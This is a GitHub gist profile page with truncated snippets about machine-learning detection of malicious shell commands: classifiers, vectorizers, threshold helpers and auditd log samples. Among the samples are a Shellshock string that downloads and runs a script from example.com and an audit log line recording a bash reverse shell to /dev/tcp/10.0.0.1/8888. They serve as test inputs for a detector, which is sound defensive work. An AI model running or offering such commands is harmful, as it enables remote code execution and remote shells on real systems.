Skip to content

Instantly share code, notes, and snippets.

View dtrizna's full-sized avatar

Dmitrijs Trizna dtrizna

View GitHub Profile
def normalizeStringHash(string):
string = re.sub(r'[0-9a-fA-F]{64}', "<sha256>", string)
string = re.sub(r'[0-9a-fA-F]{40}', "<sha1>", string)
string = re.sub(r'[0-9a-fA-F]{32}', "<md5>", string)
return string
@dtrizna
dtrizna / gradient_accumulation.py
Created March 5, 2023 18:22 — forked from thomwolf/gradient_accumulation.py
PyTorch gradient accumulation training loop
model.zero_grad() # Reset gradients tensors
for i, (inputs, labels) in enumerate(training_set):
predictions = model(inputs) # Forward pass
loss = loss_function(predictions, labels) # Compute loss function
loss = loss / accumulation_steps # Normalize our loss (if averaged)
loss.backward() # Backward pass
if (i+1) % accumulation_steps == 0: # Wait for several backward steps
optimizer.step() # Now we can do an optimizer step
model.zero_grad() # Reset gradients tensors
if (i+1) % evaluation_steps == 0: # Evaluate the model when we...
from sklearn.neural_network import MLPClassifier
X_full_dataset = [...]
y_full_dataset = [...]
mlpModel = MLClassifier(
hidden_layer_sizes=(128,64)
)
mlpModel.fit(full_dataset, y)
from sklearn.metrics import roc_curve, det_curve
def get_threshold_from_rate(thresholds, rate_array, rate):
index = np.where(rate_array >= rate)[0][0]
return thresholds[index]
def get_value_from_threshold(values, thresholds, threshold):
try:
thr_index = np.where(thresholds <= threshold)[0][0]
except IndexError:
from xgboost import XGBClassifier
xgb_model = XGBClassifier(n_estimators=100, use_label_encoder=False, eval_metric="logloss")
xgb_model.fit(
X["HashingVectorizer"], y
)
shellshock_backdoor = "() { :;}; /bin/bash -c 'curl -O /tmp/foo.sh example.com/test; nohup bash /tmp/foo.sh &'"
print(xgb_model.predict_proba(
hvwpt.transform([shellshock_backdoor])
from sklearn.model_selection import cross_validate
from sklearn.model_selection import StratifiedKFold
def print_scores(cv):
means = np.mean(list(cv.values()), axis=1)
[print(f"\tAverage {x[0].strip('test_'):<10} over all folds: {x[1]:.2f}") for x in zip(cv.keys(), means) if "test_" in x[0]]
print()
cv = {}
metrics = ["accuracy", "precision", "recall", "f1", "roc_auc"]
type=EXECVE msg=audit(1648469217.476:296): argc=2 a0="readlink" a1="/usr/bin/python"
type=EXECVE msg=audit(1648469217.484:298): argc=4 a0="grep" a1="-q" a2="^ID.*=.*ubuntu" a3="/etc/os-release"
type=EXECVE msg=audit(1648469217.512:299): argc=3 a0="tput" a1="setaf" a2="1"
type=EXECVE msg=audit(1648469218.312:300): argc=4 a0="/bin/sh" a1="-c" a3="/bin/sh -c /bin/bash -i \u003e\u0026 /dev/tcp/10.0.0.1/8888 0\u003e\u00261"
type=EXECVE msg=audit(1648469219.440:302): argc=3 a0="/usr/lib/x86_64-linux-gnu/utempter/utempter" a1="add" a2="tmux(3353).%1"
import re
from nltk.tokenize import WordPunctTokenizer
from sklearn.feature_extraction.text import HashingVectorizer
wpt = WordPunctTokenizer()
hvwpt = HashingVectorizer(
preprocessor=lambda x: re.sub(r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}", "_IPADDRESS_", x),
tokenizer=wpt.tokenize,
token_pattern=None,
lowercase=False,
{
"program_name": "auditbeat",
"hostname": "k8s-minikube",
"...",
"auditd": {
"message_type": "syscall",
"summary": {
"actor": {
"primary": "root",
"secondary": "root"
import random
import string
import time
def get_random_ip(octets=4):
return ".".join(map(str, (random.randint(0, 255) for _ in range(octets))))
def get_random_string(length=10):
return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(length))